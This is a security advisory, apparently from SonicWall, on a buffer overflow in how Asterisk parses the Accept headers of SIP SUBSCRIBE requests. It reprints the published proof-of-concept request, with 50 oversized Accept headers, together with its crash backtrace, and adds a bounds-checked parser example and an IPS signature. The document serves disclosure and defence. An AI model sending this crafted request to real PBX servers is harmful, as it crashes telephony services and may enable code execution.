Asterisk SUBSCRIBE Request Buffer Overflow Vulnerability

March 2, 2018

Asterisk is a software implementation of a telephone private branch exchange (PBX). It allows telephones interfaced with a variety of hardware technologies to make calls to one another, and to connect to telephony services, such as the public switched telephone network (PSTN) and voice over Internet Protocol (VoIP) services.

A memory corruption vulnerability has been reported in Asterisk. Due to improper handling of the SUBSCRIBE request in the Session Initiation Protocol (SIP) implementation, a buffer overflow can be triggered inside the service process's memory space. An attacker could send a specially crafted SUBSCRIBE request and cause a denial of service or even remote code execution on the target server with the privileges of the service process.

SIP is a request-response based application layer protocol. The memory corruption vulnerability is triggered when the Asterisk SIP service parses the SUBSCRIBE request's headers. During this process, a sequence of C functions is called:

  • pubsub_on_rx_subscribe_request(): request handling
  • subscription_get_generator_from_rdata(): constructs the request object in memory

The SIP protocol defines a header called "Accept", which may appear as multiple entries inside a request's headers. When the function subscription_get_generator_from_rdata() handles a group of "Accept" request headers, it allocates an array in memory for their contents, and the size of the array depends on the value num_accept_headers. However, this value comes from user input and was trusted unconditionally, resulting in an arbitrary write vulnerability inside the Asterisk service's memory space.

Proof-of-concept code has already been published on GitHub [1]:

 SUBSCRIBE sip:3000@ SIP/2.0
 To: 
 From: Test 
 Call-ID: 1627b84b-b57d-4256-a748-30d01d242199
 CSeq: 2 SUBSCRIBE
 Via: SIP/2.0/TCP;branch=z9hG4bK1627b84b-b57d-4256-a748-30d01d242199
 Contact: 
 Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 (REPEAT ACCEPT FOR 50 TIMES)
 Event: message-summary
 Allow: Allow: SUBSCRIBE, NOTIFY, INVITE, ACK, CANCEL, BYE, REFER, INFO, OPTIONS, MESSAGE
 Authorization: Digest username="3000",realm="asterisk",nonce="1517181436/80170188d05f4af45b8530366c8e7e5e",uri="sip:",response="a4a88b777731349899227dc3170efdcf",algorithm=md5
 Content-Length: 0

The proof of concept fills each Accept header with 100 'A' characters. Such a request smashes the stack with 0x41 bytes, overwriting critical pointers and crashing the service process.
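The following is an added example, not Asterisk's own code and not the published proof of concept. It shows the pattern described above from the defender's side: a parser that collects Accept header values into a fixed-size array, with the bounds check whose absence the advisory describes. The loop without the `n >= max_out` test is the vulnerable shape (the counter grows with every header the client supplies and the writes run past the array); with the test, a message carrying too many Accept headers, such as the 50-header request above, is rejected instead of parsed. MAX_ACCEPT, MAX_VALUE_LEN, collect_accept_headers, parse_constructed_subscribe and the constructed SUBSCRIBE message are all assumptions of this example; Asterisk's real limit and function names are not stated on this page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed limits for this example; Asterisk's own compile-time limit for
 * the Accept array is not given on this page. */
#define MAX_ACCEPT 8
#define MAX_VALUE_LEN 64

/* Negative result codes returned by the hardened parser. */
enum accept_result {
    ACCEPT_TOO_MANY = -1,   /* more Accept headers than the array can hold */
    ACCEPT_TOO_LONG = -2    /* a single Accept value exceeds MAX_VALUE_LEN-1 */
};

/*
 * Collect the value of every "Accept:" header in a raw SIP message into the
 * fixed-size array `out` (at most `max_out` entries).
 *
 * Returns the number of Accept headers stored (>= 0), or a negative
 * accept_result when the message would not fit. The `n >= max_out` check is
 * the one that turns an unbounded write into a rejected request.
 */
int collect_accept_headers(const char *msg,
                           char out[][MAX_VALUE_LEN], size_t max_out)
{
    int n = 0;
    const char *line = msg;

    while (line && *line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);

        /* Header names are case-insensitive in SIP; this example matches the
         * canonical spelling and the all-lower-case form only. */
        if (len >= 7 && (strncmp(line, "Accept:", 7) == 0 ||
                         strncmp(line, "accept:", 7) == 0)) {
            const char *val = line + 7;
            size_t vlen = len - 7;

            /* Trim leading whitespace and a trailing CR / spaces. */
            while (vlen > 0 && (*val == ' ' || *val == '\t')) { val++; vlen--; }
            while (vlen > 0 && (val[vlen - 1] == '\r' || val[vlen - 1] == ' ')) vlen--;

            /* Bounds checks: reject the request rather than write past `out`. */
            if ((size_t)n >= max_out)
                return ACCEPT_TOO_MANY;
            if (vlen >= MAX_VALUE_LEN)
                return ACCEPT_TOO_LONG;

            memcpy(out[n], val, vlen);
            out[n][vlen] = '\0';
            n++;
        }
        line = eol ? eol + 1 : NULL;
    }
    return n;
}

/* Build a constructed SUBSCRIBE message (not the published PoC) carrying
 * `count` Accept headers, each holding `value_len` 'A' characters, then run
 * it through the hardened parser and return the parser's result. */
int parse_constructed_subscribe(int count, size_t value_len)
{
    static char msg[16384];
    char value[256];
    char accept[MAX_ACCEPT][MAX_VALUE_LEN];
    size_t used = 0;

    if (value_len > sizeof value - 1)
        value_len = sizeof value - 1;
    memset(value, 'A', value_len);
    value[value_len] = '\0';

    used += (size_t)snprintf(msg + used, sizeof msg - used,
                             "SUBSCRIBE sip:3000@pbx.example SIP/2.0\r\n"
                             "Event: message-summary\r\n");
    for (int i = 0; i < count && used < sizeof msg; i++)
        used += (size_t)snprintf(msg + used, sizeof msg - used,
                                 "Accept: %s\r\n", value);
    if (used < sizeof msg)
        snprintf(msg + used, sizeof msg - used, "Content-Length: 0\r\n\r\n");

    return collect_accept_headers(msg, accept, MAX_ACCEPT);
}

int main(void)
{
    printf("3 Accept headers of 20 bytes: %d\n", parse_constructed_subscribe(3, 20));
    printf("50 Accept headers of 20 bytes: %d\n", parse_constructed_subscribe(50, 20));
    printf("1 Accept header of 100 bytes: %d\n", parse_constructed_subscribe(1, 100));
    return 0;
}
```

The design point is that the limit is enforced at the moment of the write, against the capacity of the destination, rather than inferred from a count the client controls; a SIP stack that does this fails closed on oversized requests and never reaches the stack-protector abort shown in the trace below.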

 *** stack smashing detected ***: /opt/asterisk/sbin/asterisk terminated
 Thread 25 "asterisk" received signal SIGABRT, Aborted.
 [Switching to Thread 0x7ffff0481700 (LWP 129)]
 0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
 54	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
 (gdb) bt
 #0  0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
 #1  0x00007ffff510302a in __GI_abort () at abort.c:89
 #2  0x00007ffff51437ea in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff525b49f "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175
 #3  0x00007ffff51e515c in __GI___fortify_fail (msg=, msg@entry=0x7ffff525b481 "stack smashing detected") at fortify_fail.c:37
 #4  0x00007ffff51e5100 in __stack_chk_fail () at stack_chk_fail.c:28
 #5  0x00007ffff1613be2 in subscription_get_generator_from_rdata (handler=, handler=, rdata=) at res_pjsip_pubsub.c:755
 #6  0x4141414141414141 in ?? ()
 #7  0x4141414141414141 in ?? ()
 #8  0x4141414141414141 in ?? ()
 #9  0x4141414141414141 in ?? ()
 #10 0x4141414141414141 in ?? ()
 #11 0x4141414141414141 in ?? ()
 #12 0x0041414141414141 in ?? ()
 #13 0x4141414141414141 in ?? ()
 ....

The SonicWall Capture Labs Threat Research team has developed the following signature to identify and stop attacks exploiting this vulnerability:

  • IPS 13238: Asterisk SUBSCRIBE Request Buffer Overflow